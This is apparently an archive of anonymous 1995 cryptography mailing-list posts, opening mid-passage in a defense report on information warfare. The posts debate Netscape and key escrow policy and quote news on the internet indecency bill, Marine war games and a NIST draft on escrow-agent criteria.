   another nation's banking system but not without risk of    damage to the global banking system. Can physical war be replaced by a
   survival contest among rival information systems under attack? Perhaps
   the United States should concentrate on developing defensive    The United States has the biggest stones, but also the most glass in
   its house. ...
   A world of peer strategic competition would drive the military in
   familiar directions towards: nuclear forces, satellites and    long-range warning systems; tactical ballistic missile defense systems
   (including for allies); perhaps strategic defense systems and space
   attack systems; air defense in general; information warfare    security; and robust command-and-control.
   Bullies
   If the circumstances and logic of the Bottom Up Review hold true for
   two more decades, U.S. armed forces will be sized and    primarily to engage in two simultaneous major regional    (MRCs). The usual suspects in such MRCs (e.g., Iran, Iraq,    Korea) are presently unsophisticated rogue states that aspire to
   nuclear weapons and delivery systems. Conference participants believe
   that U.S. forces could cope with the challenges of future    warfare, even if force levels continue to diminish. However,    events would make the United States rethink its strategy    weapons proliferation, and the sophisticated exploitation of    technology markets. ...
   Alternatively, an MRC opponent may be able to avoid going to    nuclear threshold by a strategy which uses smart munitions,    command-and-control, and a variety of surveillance technologies (e.g.,
   unmanned aerial vehicles, third-party satellite surveillance) to exact
   damaging casualties on U.S. forces. ...
   Against a sophisticated
   regional foe, the United States might not want to use platforms at all
   but rely on a combination of stand-off attack forces, and
   information-based warfare assets (for giving targeting data to local
   coalition partners), coupled with special operations forces used for
   liaison and other tasks.
   Terrorism
   Largely because of the limited capability that classical    instruments have in coping with terrorism, conference    kept returning to the threat that it may pose to U.S.    security. Incidents may range from the use of conventional    (e.g., what if the van in the World Trade Center explosion had been
   parked in a more vulnerable spot), to nuclear or chemical    biological agents, and their analogue in cyberspace    warfare.
   Devices that can cause terror are getting easier to manufacture and
   transport and harder to detect. The equipment for    biological agents is inexpensive; the equipment for    computer agents is even cheaper. Many otherwise third-world    nations have very large computer-literate cohorts that make    potential information warfare powers. ...
   Chaos
   Over the next two decades, states will continue to fail. Some failures
   may create circumstances (e.g., refugees, malcontents, and
   environmental damage) which topple other states. To cope, the United
   States may need a robust capability to conduct peace and    operations. ...
   A concentration on peace operations may also be a good reason to
   expand foreign military interactions. Improving interoperability with
   future coalition partners carries many advantages. Yet, above a
   certain technological level of integration, the risk of    information on U.S. capabilities to what may be temporary allies has
   to be carefully managed.
   If countering chaos were the primary mission of the U.S. armed forces,
   then they would have to become lighter and more mobile (because states
   often fail with little warning, and the United States usually responds
   only in extremis). The Army and Marine Corps would have larger roles,
   while the Navy and Air Force would focus on lift. As    operations become the norm, some functions assigned to reserve units
   may have to be shifted to active ones (e.g., to allow civil    assets to be used more frequently).

@_date: 1995-12-03 09:29:56
@_author: Anonymous 
@_subject: Talking to Jim 
Jim Clark was quoted as having written:
So what?  If their position were (as it has long been in some countries) that their "concern" is best addressed by wholesale eavesdropping and informant networks, would you cave to that, too? This is an absurd foundation.
Whoa!  You're giving away the store without a fight!  You've been able to capture what, 60-70% of the browser activity "market" and get a huge amount of capitalization from the public market, and you're whining that the world's going to end if government "restrictions" continue, just because those restrictions might slow down your commercial world conquest? Give me a break! LET THEM CONTINUE to restrict! That will take care of itself quite handily. You're just afraid you'd miss some opportunities, or be one of the commercial casualties, isn't that right? Isn't that what this is really all about? And a valid concern, too, but not at the expense of my freedom! It seems clear from the way you put this that world standardization at ANY level of security would satisfy your commercial objectives. Oh? Since when? Commercial interests have long had a heavy influence on government policies, up to and including laws and wars. Your own U.S. government doesn't hesitate to attempt to influence other governments in their enactment and/or modification of laws, even constitutions. Do you think for a moment that the Caribbean Basin Initiative (to mention just one) has anything remotely to do with the U.S.'s altruistic interest in helping Basin countries' economies? Its OVERRIDING purpose is to influence their tax laws and effectively extend U.S. jurisdiction to those countries.
In any case you're writing as if you were selling screwdrivers, not the new wave of IT. You are riding the crest of a technological revolution that is going to make some laws, some governmental policies, even some governments, MOOT. Those it doesn't bypass it will certainly not leave untouched. To be sure, there is awesome power in the hands of governments, but it is also a fact that governments can be very fragile things. Many have fallen in the history of humankind, and modern "free" societies are supposed to have governments that serve, not dictate.
Governments, geared to human processes that proceed at human speeds, unable in their inefficiency even to keep up with ordinary humans, will be completely unable to stay ahead of IT. Governments that get in the way will disintegrate. Governments that embrace the future will survive. For you or anyone else to run around to the rear and stick their tongue firmly up government's ass is exactly the wrong strategy for the future.
And some of us think that such idiocy, like celibacy, is a self-correcting phenomenon in this information age. If the French government wants to keep France behind the curve, that's fine. The French people will eventually put fire to their politicians' feet as their economy is increasingly bypassed and slides down the tubes. It's not YOUR problem to solve by going into agreement with the totalitarian objectives of Stone Age governments.
No shit!
You could have fooled ME!
It seems you really don't care, as long as you can firm up your billion and maybe roll it up to ten.  Money buys a lot of things in this world, and as long as Jim can buy HIS privacy some day, hey, that's cool! But give a bit of thought to whether your children's privacy and safety will be able to be bought in a world made safe for Big Brother by commercial interests willing to give away the freedom store.
So, therefore, nothing matters, right?  Don't fight for the right to put locks on your doors, because if the government really wants to get in your house, they will. Here's a flash bulletin, Jim: That's not the kind of thinking that secured the freedoms Americans like to think they have. It is, though, the kind of thinking that can end them.
Obviously specious, because Netscape came into existence in a world of controls over which it had no influence.  Having thus come into existence, and quite successfully so far, it is absurd to claim that if you don't cave and become supine enough to slide under the barriers that already existed, you will be put out of business.
I believe you have underestimated the power of a leading-edge 21st-century information product that is "Not available where regulated." I think you're copping out and looking for the easier, "Now with the best encryption available! (because no one is allowed to offer better)"
No, Jim, that is not nor has it ever been the fundamental issue for business or individuals, least of all in the last few centuries in the free world.  The issue for free people is how to secure the blessings of freedom, shaping government as necessary, so they can get on with their lives, which in turn is, after all, what everything is ultimately about.  Your statement is more suited to the European authoritarian mindset, which has never quite come to grips with the idea of natural rights originating in individuals and flowing, WHEN AND IF THEY FLOW, by delegation to governments.
The legitimate purpose of government is not to tell you what your boundaries and constraints are. The Declaration of Independence correctly states that the legitimate purpose of government is to secure freedoms which do not themselves originate in government.
Oh, garbage! You've just set forth the viewpoints of one of the key people who determines what Netscape's positions will be, and further, that you agreed in this with a bunch of other commercial interests! There it is:  Supine, prostrate, submissive.  Jim, there are some alt. newsgroups where you could make a bit hit with that approach.  A few thousand Mistress X's in leather await a man willing to obey their every command.
This is the heart of the matter. Dominating the U.S. market is in no way sufficient to your appetite. Maintaining a clear technological lead here, with consequent pressure on controlled markets to lift their controls and to pressure the U.S. to lift its export controls, is not what you see as the better strategy. You fear losing momentum, you covet those foreign markets, perhaps you even fear the emergence of superior foreign technology given clear incentive over time. Your choice, then, is to be an instrument in furtherance of totalitarianism in order to improve what you perceive to be your shorter-term odds, and to justify it on the basis that it is inevitable anyway. Bad. Very bad.
You seem to have walked so far down the road of saluting government that you've forgotten that there is a Congress. This is supposed to be a government of laws, not orders. It's an entirely different issue, though, than the one of embracing GAK in a bid for world browser conquest. If U.S. GAK comes to pass, it will not be without discussion and debate, some of it no doubt quite heated. Everyone will have to deal with it as they see fit. That's not the same thing as a cow offering itself for genetic engineering in order to slither a new, longer neck under the bottom strand to reach that greener grass at the expense of its legs (that's tortured, but I think it makes a nice image).
Your manner of expression supports my impression that someone has innoculated you with GAK juice.  The power of influential people to do that, and to follow through on their veiled or not so veiled threats depends entirely on their remaining unseen to the public. I'd STILL like to know who got to you and what they said.
This is the clearest thing you've written in the whole piece (though it sheds no light on Netscape's position). Makes you want to kick yourself for not having set up shop in some other country in the first place, doesn't it?  You can BET that other people ARE setting up shop in other countries, even as we write. The logistics of information over distance are collapsing at an astonishing rate. What would have been difficult or prohibitively expensive five years ago is feasible today. What seems too much trouble today will be a piece of cake next year.
What you *could* have done early on, had you or anyone else clearly seen where this was headed (and hey, who did?), would have been to contract with a resource in a crypto-unregulated jurisdiction, perhaps even one where constitutional or legislative bars to such control exist or could be construed, to license the necessary parts your company in the form you need them. Done right, this could have positioned you to import the crypto as it could be imported into any supposedly free country, penalizing thereby only the thoroughly clueless countries. You would never have been in the position of exporting it. If the dotted line in your product can't be at the "hooks" level because of restrictions, there is some level higher than that and lower than "run netscape" at which the dotted line CAN be drawn and still pass muster, or all software in the world would be stillborn.
Too late now, eh? Maybe. Maybe not.
That's scary. You'd be better advised to hang around with people steeped in the rugged individualism of America's genesis. If you put your efforts into creating irresistible forces in the marketplace you could leave the process of educating lawmakers to their constituents, who would do it by putting political fire to their feet, something to which politicians respond better and faster in any case.
How many of the people who pay your bills do you think will be comfortable with the idea of you cuddling up with a bunch of other self-appointed world planners (some of whom no doubt come from countries where freedom is a quaint notion that has never quite been fully grasped), dividing up their freedoms and handing them to governments on a silver platter, presumably in exchange for injections of grease to your money machine?
You're welcome.
Now you know.
One of the great values in the new information paradigm is that you can, if you choose, read messages no one would have dared bring you in the insular past. Executives who get to hear only what they want to hear usually fail, often spectacularly. Any executive in a publicly-discussed business today who wants to take the pulse of real people has only to tune in and see for himself. It takes courage, though.
We Jurgar Din
(that will have to suffice: I do not yet live in a free country)
+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +

@_date: 1995-12-03 09:32:34
@_author: Anonymous 
@_subject: Getting a copy of the Jim Clark speech 
A much simpler method exists for serving special documents dependent on
client profile, provided you are using Apache 0.8.x (I know sameer is). See
I suppose someone should ask: what is the crypto relevance of this thread?
Wilhelm Busch
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
-----END PGP PUBLIC KEY BLOCK-----

@_date: 1995-12-03 09:56:00
@_author: Anonymous 
@_subject: Fight.comp.crime.like.a.paranoid.FBI.psycho 
Coming to Terms with Computer Crime
   Computer Crime: A Crimefighter's Handbook
   David Icove, Karl Seger, and William VonStorch
   O'Reilly and Associates Inc., $24.95; 800-998-9938
   ISBN: 1-56592-086-4.
By Don Willmot
If you tend to be a paranoid type of person, Computer
Crime: A Crimefighter's Handbook will keep vou up at
night pondering the incredible number of computer crimes
that people can commit and the difficulties involved in
stopping them.
The book, split into sections that deal with defining
computer crimes. preventing them, and handling them, is
loaded with fascinating facts. When you stop to think
about it. the number of different types of crime is
alarming: sabotage. revenge, vandalism, theft,
eavesdropping, even "data diddling." For each type of
attack, the book suggests preventive measures and
strategies, all in commonsense style and plain English.
You'll feel like an FBI agent as you read the personality
profiles of different types of computer criminals.
Hackers, crackers, and vandals are all psychoanalyzed,
and interesting charts of "vulnerabilities" and
"countermeasures" will help you make plans to keep your
organization safe from outside attack. The book includes
discussions of everything from choosing locks and keys to
interviewing personnel, setting up "concentric circles"
of defense perimeters, and forming a crisis-management
team to handle the fallout from a successful computer
crime. There's even an entire page devoted to all the
passwords you should never use.
Almost one-third of the book is given over to the actual
text of federal and state laws used to prosecute computer
crime. This section is meant not to be read but to be
used instead as a reference.

@_date: 1995-12-03 10:07:09
@_author: Anonymous 
@_subject: Jim Clark, "Mr. Bubble" 
Alex Strasheim, 12/2/95, 6:53 PM:
      I do. I regard the capacity to do so as crucial, and I regard the
fact that you *don't* expect them to as very telling. As has been pointed
out extensively, the chances that he'll manage to hang on to his
soft-earned cash until he can sell out are a long shot--unless he takes a
stand against GAK. Governmental policy on the subject of crypto has relied
upon secrecy, obscurity, and above all terrorizing individuals; the gov't
would be extremely reluctant to throw the book Netscape, given its
symbolic significance in the market. And even if it did, Clark's future
would be assured--maybe after he got out of Club Fed, but assured
      Let me be clear: if Clark and Netscape said "We're implementing and
releasing a version with a key length we support," crypto policy would be
the lead story on the evening news--and the gov't would lose. The only
question is how fast.       You set forth all these silly generalities as though they suggest
that NS's best bet--for Clark, for itself, for the public--is to go along
with US policy? Bullshit. Their best bet is to use their golden-boy status
to sucker punch the gov't.
      Bah. Why not:
      1     Make illegal software available by FTP
      2     Explain it's doing so because ITAR is bullshit
      3     Face the gov't down in the press and in the courts       If NS did this, they'd win BIG.

@_date: 1995-12-03 12:24:48
@_author: Anonymous 
@_subject: Mr. Bubble II 
Tim May, 12/3/95, 2:22 PM :
      Gee, Tim, this is *your* thesis?       And?
      Not strong at all, actually.
      [self-congratulations deleted]
      Like many entrepreneurs, he is an opportunist in every sense, good
and bad. He has yet to advance -- "graduate" maybe -- beyond that point.
NS's stance re GAK is a golden opportunity for Mr. Bubble either to
graduate or to get popped: either patted on the back by Papa State or
popped in the noggin. When "opportunity" is at stake, he's a shrewd
maneuverer; but when pitting his integrity against federal charges is at
stake, he's still a kid -- he doesn't see the opportunity in it.
      Partner, schmartner: "partners" can be adversarial, and adversarial
relations can become *very* adversarial. Here's the question: is the dog
gonna wag the tail or vice versa? The USG has, as we all know,
demonstrated its infinite capacity to knuckle under in the face of
hardened opposition, whether announced or de facto. NS is in a privileged
position to drag the LEA establishment onto the mat, with the whole of the
American public watching. And it stands to gain from doing so, as do we
      But Mr. Bubble wants to be friends, wants to receive genteel toasts.
      With the kind of money Mr. Bubble stands to make -- whether from NS
or from subsequent ventures -- he should be maybe just a bit tougher. If
he's looking for models, names like Carnegie and and Bismarck come to
mind. (Note that their progeny *still* have money, not 2 years later but
*generations* later.)
      On the contrary, it is sheer speculation that negotiations about GAK
*haven't* been going on. This shit doesn't happen by magic.
      Yes.
      Yes.
      [social darwinism deleated]
      NS should implement strong crypto, make it publicly available by FTP
and in a box, and see how the USG responds. The public is on its side.
      Yes.
      Because it isn't interested in freedom, here or anywhere else. It is
interested in a "controlled burn" distribution of stability and
instability. Its willingness to do business with its "enemies" has been
amply demonstrated.
      But your drift is clear, and it is right.
      On the contrary: That's when bets are on. That's when *you* -- and
all of us -- might have to start putting our money and our homes in
Corralitos on the line. That's when Black Unicorn will upload the papers
he claims to have, when I will start wrapping PGP-encrypted mail in
pretty-looking wrappers. That's when we'll have no one but ourselves to
blame. Not even Netscape.
      Yes. But NS should act first, explain second. If NS wants money,
that's how to get it.
      Yes.

@_date: 1995-12-03 12:54:42
@_author: Anonymous 
@_subject: Jim Clark, "Mr. Bubble" 
Alex Strasheim:
      If I were worth billions, if I were the sparkle on the high-tech
bubble, if I had a Major hand in engineering crucial protocols, if my
company were so young that it hadn't yet had time to bog down in business
as usual, I think I probably would. That's a lot of Big talk and a lot of
Ifs, ain't it? But that's how it goes: I doubt he -- or anyone else --
would give as much to my LDF as I gave to his (chump change, but more than
I could afford).
      Clark should ask himself what Rabbi Akiva put best:       If not me, who?
      If not now, when?
      I do my small part, in my small way; he can do his big part, in his
big way. One thing scares the spooks more than what they oppose:
Hieronymous

@_date: 1995-12-03 16:14:43
@_author: Anonymous 
@_subject: apachessl info 
What I missed was the how-to on getting a certified key. Wasn't there a way
of doing that through e-world (Apple's on-line service) for free?
Wilhelm Busch
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
-----END PGP PUBLIC KEY BLOCK-----

@_date: 1995-12-03 18:34:36
@_author: Anonymous 
@_subject: info? 
Sure, Joe! We were founded several thousand years ago, have had chapters in virtually all societies and cultures beyond the truly primitive ones. Some of our members founded the United States of America some time back -- maybe you've heard of it? We have initiation rites that often involve learning arcane and complex formulae from thick books, we have secret handshakes, decoder rings, and we often like to roast our victims over a slow fire. There's hardly anything that goes on in the world that our members don't affect, and still, the society at large doesn't really know we're here. If you're looking for a secret cabal well, gee, you've come to the right place!
If you'd like an interesting and colorful brochure containing all the details and benefits of membership, just pick up the phone, call your mother, and ask for one!
Thank you for inquiring about the International Gourmet Cooking Society!
Salsa Sam

@_date: 1995-12-03 18:39:24
@_author: Anonymous 
@_subject: Jim Clark, "Mr. Bubble" 
Dan Weinstein:
      And you've just proven yourself to be "a little bit slow";
hypocrites, at least, can change their ways. This discussion is about the
effects that Jim Clark, someone who is assessed as a billionaire and who
heads a Wall St.-bedazzling multibillion-dollar corporation, can have on
USG crypto policy; yet you would get into a tawdry comparison of "personal
failings." I will continue not to trumpet the specifics of any
crypto-promoting illegalities which I may or may not have engaged in, and
I'll thank you to do the same.
      BU was right: there's gotta be a self-help book called something
like "Learning to Say YES!" that would provide you with a more appropriate

@_date: 1995-12-04 07:41:16
@_author: Anonymous 
@_subject: Do the Right Thing 
Responding to msg by anonymous-remailer at shell.portal.com () on Mon, 4 Dec  1:42 AM
Financial Times, Dec 4, 1995
US Marine chiefs trade places to experience tranche warfare
Officers are preparing to do virtual battle in the Nymex oil
pits [and wargame FinCide]
By Laurie Morse
A dozen US Marine Corps generals and colonels will today march
on to the New York Mercantile Exchange trading floor and start
matching wits with commodity futures traders.
The traders often describe their fraught existence in the
trading rings as virtual warfare, and the US military appears
to agree.
Keen to find ways of training officers to cope with the
demands of high-tech 21st-century warfare, a group of Marine
Corps top brass will venture into the Nymex crude oil pit in
the World Trade Center after the regular market has closed.
Assisted by a group of handpicked veteran commodity traders,
the marines will plunge into a simulated session of futures
trading that will include several market reversals and a
barrage of oil-linked "news".
Mr Gary Lapayover, the Nymex trader co-ordinating the event,
says the trading session will allow the officers and traders
to become acquainted on friendly turf, and give the Marines a
glimpse of the multiple tasks and the speed -- that breakneck
trading entails.
Today's simulated trading will be followed tomorrow by a war
games session. About 15 traders will follow the generals to an
old officers' club on Governor's Island, off Manhattan, and
test their skills in a computerised game designed by Gama
Corp. a Virginia-based company that specialises in
computer-generated battle scenarios.
Later, the traders will tell the officers and their aides what
they think of the battle experience.
What do the Marines hope to learn from the commodities pits?
"Our vision of what warfare will be in the 21st century is
very different from what we've faced in the 20th," says
Colonel Tom Harkins, director of operations at the Marines'
war-fighting laboratory in Quantico, Virginia.
In future, the Marines expect to be drawn into smaller
conflicts of the type seen in Somalia and Bosnia. At the same
time, warfare will become increasingly digitalised, calling
for rapid decision-taking amid a barrage of information.
"How does a commander make decisions on a digital
battlefield?" asks Col Harkins. "Technology will increase the
tempo of battle, and the influx of digital information will
require skills in what you might call pattern analysis. This
is what futures traders do. In this exercise we want to see
how people who face these conditions every day deal with the
stress, and get comfortable with the risks."
During tomorrow's war games, traders will be confronted by an
on-screen battle area laid out on a grid, with as many as 50
small teams of cyber-soldiers seeking the "enemy".
Once "contact" is made, the teams will request firepower.
Under pressure, "commanders" must decide how to deploy
resources to the best strategic advantage, while limiting
For Mr Eric Bolling, an independent trader who has survived
nine years in the Nymex energy pits, the Marines are being
shrewd in seeking to cross laser-swords with battle-hardened
heroes of the trading pits.
Mr Bolling, a 33-year-old former minor league baseball player,
has no military background, but sees a lot of parallels
between trading, sport and the armed services. All three
require high levels of self-motivation and decision-making
Some of the generals and colonels may be shown to be more
suited to high-stress, high-stakes environments than others,
he says. "You have to be able to prioritise and analyse a lot
of information rapidly -- then initiate risk by making a
decision; and, finally, manage that risk by having the
discipline to manage the trade," says Mr Bolling.
"A lot of people can't do that, and wash out of these markets.
I don't think it's something that can be learned really --
it's a personality type."
Mr Lapayover said he selected floor veterans like Mr Bolling
to participate because he was looking for "survivors" people
who have been successful traders over a number of years.
"Military experience wasn't a factor. The Marines are looking
for people that can help them understand the process."
Mr Lapayover has also suggested that the top brass visit the
"war rooms" of America's largest investment banks to observe
Wall Street's fixed income and equities traders, and the
strategies of high-stakes corporate raiders.
The war games are part of a new programme directed by General
Charles Krulak, commandant of the Marine Corps.
"War games are not designed to give you a total solution, they
are designed to give you insight" he says. "We're going to
have our laboratory analysts with us, and they will be looking
at improving the process."

@_date: 1995-12-05 12:51:34
@_author: Anonymous 
@_subject: Do the Right Thing 
Perhaps they've worked for a corporation? :-)
Certainly. In many organizations, the people who set policy, and the people
who "run" the corporation are not the same. Often important managers
disagree on issues or on how to achieve them. Individuals within the company
are often focused more on their careers and position within the company,
than on the affect their decisions have outside the company.
To equate an organization, especially a large one, with its constituent
parts ensures that you will be continually surprised by its complex and
unpredictable behavior.
BTW, the crypto relevance of this thread is nil.

@_date: 1995-12-05 16:04:06
@_author: Anonymous 
@_subject: NIST GAK export meeting, sv 
- From Pat Farrell's  short summary of the NIST GAK
meeting (12/5/95 5:49 PM):
      (Thanks for the summary, Pat.)
      This last bit is really rich. I can't think of a single publically
defensible reason for the stipulation that every escrow agent must employ
someone with SECRET clearance, but I *can* think of a publically
indefensible reason for it -- to facilitate those spooky non-court wiretap
authorizations that've been alluded to in the fine print of the GAK
      Of course, just because escrow agents would be required to hire
*someone* with a SECRET clearance doesn't mean that *anyone* with a SECRET
clearance would fill the bill. And that's the rub: the administration of
clearing people-with-SECRET-clearances for escrow agent employment would
be conducted -- where else? -- *in secret*. SECRET clearance, of course,
wouldn't be the salient criterion; after all, there are people on the
Cypherpunks list -- and a few who aren't on it but are like-minded --
who'd be, uh, reluctant to deliver keys in the absence of a a wiretap
authorized by a judge.
      And, as a petty aside, it's nice to see that the gov't had cooked up
yet another way to force potentially legitimate businesses to pay its
stoolpigeons to chip away out our civil rights.

@_date: 1995-12-05 19:33:59
@_author: Anonymous 
@_subject: NIST GAK export meeting, sv 
Tim May 12/5/95 6:25 PM:
      Nice point, though I too doubt that's the reason: if *every* agent
needed to be cleared, then this clearance stipulation would serve nicely,
but if only *one* at every escrow agency needs to be cleared...
      Organizations like SAIC seem like "naturals" for GAK escrow agents

@_date: 1995-12-05 20:44:07
@_author: Anonymous 
@_subject: Secret Clearance 
In a discussion of governmental efforts to deny presumedly innocent
citizens the assurance that they can conduct their affairs in privacy --
and to require that "trusted," "impartial" escrow agents employ someone
who has been vetted according to undisclosed criteria, the best you can
come up with is this "conspiracy theory" saw? Did *I* invent this
      Therefore, *every* GAK escrow agent *must* employ someone with an
arbitrary clearance level?
      And what protected him? Incompetence, cronyism, corruption, and
ass-covering. Of course, any failures in GAK administration would be
handled differently...
      I get the point. I *disagree* with it.
      On the *hardware* front, definitely -- if not by law then simply by
practical need. Does the hardware in question *necessarily* apply to every
citizen in America?

@_date: 1995-12-06 14:30:30
@_author: Anonymous 
@_subject: Civilizing Cyberspace (book note) 
Steven E. Miller, a member of the national board of
directors of Computer Professionals for Social
Responsibility, has published a new book, *Civilizing
Cyberspace: Policy, Power and the Information
Superhighway* (Addison Wesley, 1995, 413 pages).
This is the best book I have seen on the public policy
debates surrounding the information superhighway. It
covers all aspects of this debate, including democracy,
citizenship, community networks, privacy, intellectual
property, competing models of the NII, universal service,
equity, freedom of expression, protecting the public
interest, encryption, and so on.
Highly recommended for anyone interested in this subject,
or for use as a text in classes.
Gary Chapman, Coordinator, The 21st Century Project
LBJ School of Public Affairs, University of Texas, Austin

@_date: 1995-12-07 06:39:07
@_author: Anonymous 
@_subject: Prayers Pay 
The raiders hit early this morning, banging the door about
   4 AM, me groggily peeking out, a subpoena wadded into my
   shirt, then the bastards barged in. My ex-wife holding
   back, grinning like shit, saying you're fucked this time
   Johnny wee-dick.
   The black suits took all of it, computers, backup disks and
   tapes, printers, scanners, plotters, fuck, even the
   phones and message box -- jeez, why those?
   Harassment, teaching you a lesson, Bess my shark phoned
   just now, they shut your business down, take weeks to
   rummage the equipment and data, give it back slowly, one
   at a time, no hurry, wanting you to ache in case they find
   nothing. Swift justice, she hisses, even if you're
   innocent, cause nobody really is, they want you to scream,
   use you to broadcast a scare.
   Fuckups are getting gutted all over that Net Playboytoy.
   Six others this week, Bess coughs on, dragging deep, it's
   gonna rain even heavier in Exon's maelstrom, sweet darling
   maryjesus, prayers pay.

@_date: 1995-12-07 11:24:01
@_author: Anonymous 
@_subject: FW: websurfer 4.6 
Not surprising. They confuse random doodling with software, too.
The real problem with NetManage is a severe case of brain death.
The Sampler TCP/IP sucks, the paid-up TCP/IP is so-so, but of the clients, only ftp is fair, and the rest bite. All the
NetManage clients I've tried crater, Mail can't rebuild its
index structures if they are corrupted (uh, what was it that rebuild was supposed to do, Harvey?), the version of WebSurfer
I evaluated took longer and longer to load and shut down, revealed on inspection to be due to loading/storing a very wordy global history in its, ahem, config file! Delete it and your config is gone. I wouldn't concern myself with what crypto is or isn't in a NetManage product -- they are not players as far as I'm concerned. They've been riding the wave of their TCP/IP not crashing as often as some others, but otherwise they're vacuum packed, untouched by coherent human thought.

@_date: 1995-12-08 05:13:59
@_author: Anonymous 
@_subject: @v@ XXX 
Wall Street Journal, 8 Dec 1995
On-Line Society Angered by Plan to Curb Content
By Jared Sandberg
The latest move in Congress to curb "indecent" material on the
Internet triggered outrage and scorn in cyberspace, as on-line
users decried it as censorship and plotted ways to overturn
"Welcome to the age of electronic book burning," said Craig
Johnson, a consultant who worries that the term "indecent"
could be applied to literary works, publichealth and medical
exchanges, and serious discussion of AIDS and sexual behavior.
"It's not only ridiculous - it's unfair, un-American and
unconstitutional," said Eileen Kent, vice president of new
media at Playboy Enterprises Inc. She finds it
"incomprehensible" that the on-line version of Playboy could
be deemed illegal while the printed magazine isn't. "Are they
going to send me to jail and fine me a hundred grand because
I put a Playmate on the Net?" she asked. If so, "then I'm
House conferees hammering out a sweeping telecommunciations
bill voted 17-16 on Wednesday to make it illegal for anyone to
knowingly display indecent material that can be viewed by a
minor, punishable by a $100,000 fine and up to two years in
Yesterday, critics tried to counter punch. The American Civil
Liberties Union is preparing a court challenge on First
Amendment grounds. The Center for Democracy and Technology, a
cyberspace civil-liberties group, vows to do the same. On-line
services drafted a letter of protest to House Speaker Newt
Gingrich, who has opposed earlier attempts to impose
restrictions on Internet fare.
On-line advocates also are pushing for a new vote by the House
conferees to define just what "indecency" means. They are
hoping the 17-16 balance of the first vote is tenuous enough
to allow them to ease the restrictions in defining the terms.
Backed by the hectic lobbying efforts, Rep. Rick White of
Washington state, who favors a less-restrictive approach, and
allies have begun laboring to devise a limited definition of
indecency that would be acceptable to civil libertarians and
smut-fighters alike.
Without a clearer, limited definition, the "indecency"
standard faces the almost certain prospect of being struck
down by the courts as unconstitutional, the White forces
On-line experts, moreover, argue the latest measure could
create big problems and unintended consequences. If one 16-
year-old zaps lewd fare to another, could the sender be
imprisoned? If an adult makes a racy observation on an
electronic bulletin board and a minor tracks it down and reads
it, should the adult be punished?
Last week, America Online Inc., in an effort to strike
vulgarity from members' personal on-line "profiles," decided
to strike all uses of the word "breast" - and thereby erased
the biographies of scores of women who had breast cancer.
AOL "responded to the climate of fear created by Congress,"
Mike Godwin, legal counsel for the Electronic Frontier
Foundation. An AOL spokeswoman said the deletions were "a
mistake on our part."
Robert L. Smith, executive director of the Interactive
Services Association, said such snafus could occur more and
more as Internet access providers fret about whether their
so-called content might be deemed indecent. "It's going to
cause confusion, industry uncertainty and years of litigation,
which will result in Congress not solving the problems they
wanted to solve," Mr. Smith said.
The crackdown effort, moreover, may be fruitless in a global
computer network that reaches more than 150 countries. "Those
American laws don't apply to me," said Patrick Groeneveld, a
professor at Delft University in the Netherlands. Mr.
Groeneveld, who once ran a popular Internet archive that
included pornographic material, said Congress's efforts amount
to U.S. "imperialism."
"I didn't vote for America's congressmen," he said.
"Legislators and some consumers don't understand the
Internet," said Jerry Berman, executive director of the Center
for Democracy and Technology. "So, it becomes an easy target
for political posturing."

@_date: 1995-12-08 08:23:34
@_author: Anonymous 
@_subject: Key Escrow Agent Criteria  [Draft] 
[From NIST 12-08-95]
The following draft discussion paper was distributed at the  12/5/95 meeting at NIST on draft criteria for 64-bit software key  escrow exportability.
                              DRAFT
                            (12/1/95)
                    Key Escrow Agent Criteria
An often heard concern regarding key escrow encryption is that  users of such encryption are vulnerable to abuse of the escrowed  key by the escrow agents or others.  Many have suggested that  changes in the law are needed that specifically, criminalize any  such abuses.  We agree that such laws will be beneficial in  deterring acts by anyone to access escrowed keys without  authority or to undermine the integrity of the escrow key system.
However, the availability of criminal prosecution is not alone  sufficient.  Key escrow agents must be selected not only with a  view toward assuring the availability of escrowed keys for  properly authorized government officials, but also to assure that  the escrow agents have the commitment and means to protect the  confidentiality and integrity of the keys they escrow and the  escrow system.  This will be particularly important if, as we  expect will occur, some key escrow products will be designed such  that the escrow agent could discern the identity of the user from  the keys and other information that is escrowed with them.
The following criteria were drafted with these principles in  mind.  We have not yet addressed conditions under which users can  be the sole repository of the keys for their system.  We  recognize that some organizations or people do not want anybody  but themselves to escrow their keys.  However, since an important  reason for escrowing is to preserve effective law enforcement, we  must assure authorized officials can reliably and timely obtain  access to escrowed keys through entities independent of the  subject of electronic surveillance.  Thus we welcome suggestions  on how best to meet this range of In considering the criteria appropriate for approving escrow  agents, we considered whether the government needs to assure it  has timely and reliable access when authorized and what key  escrow encryption users would want to ensure that the escrowing  of keys does not undermine their security.  Of course, the  government is also a user of key escrow encryption products and  shares with other users an interest to ensure the integrity and  security of the escrow system.  Similarly, organizations  interested in data recovery share the government's interest to  have a system through which access to escrowed key is enabled  under appropriate circumstances.  With these considerations in  mind, we developed criteria in two categories, "Escrow System  Integrity and Security" and "Key Access Requirements."  We expect  that prospective escrow agents that meet criteria such as these  would be considered as "approved" escrow agents for export  purposes, to hold keys for government systems, etc.
Note that keys and/or key components for devices that may process  classified information shall be escrowed with escrow agent  entities selected by the U.S. government, and that those escrow  agent entities may be required to meet more stringent  Escrow System Integrity and Security
1.   Escrow agent entities shall devise and institutionalize
     policies, procedures, and mechanisms to ensure the
     confidentiality, integrity, and availability of key escrow
     related information.
     a.   Escrow agent entities shall be designed and operated           that a failure by a single person, procedure, or
          mechanism does not compromise the confidentiality,
          integrity or availability of the key and/or key
          components (e.g., two person control of keys, split
          keys, etc.)
     b.   Unencrypted escrowed key and/or key components that           stored and/or transmitted electronically shall be
          protected (e.g., via encryption) using approved      c.   Unencrypted escrowed key and/or key components stored
          and/or transferred via other media/methods shall be
          protected using approved means (e.g., safes).
2.   Escrow agent entities shall ensure due form of escrowed      access requests and authenticate the requests for escrowed
     key and/or key components.
3.   Escrow agent entities shall protect against disclosure of
     information regarding the identity of the person/
     organization whose key and/or key components is requested,
     and the fact that a key and/or key component was requested
     or provided.
4.   Escrow agent entities shall enter keys/key components into
     the escrowed key database immediately upon receipt.
5.   Escrow agent entities shall ensure at least two copies of
     any key and/or key component in independent locations to
     help ensure the availability of such key and/or key
     components due to unforeseen circumstances.
6.   Escrow agent entities that are certified by the U.S.
     government shall work with developers of key escrow
     encryption products and support a feature that allows
     products to verify to one another that the products' keys
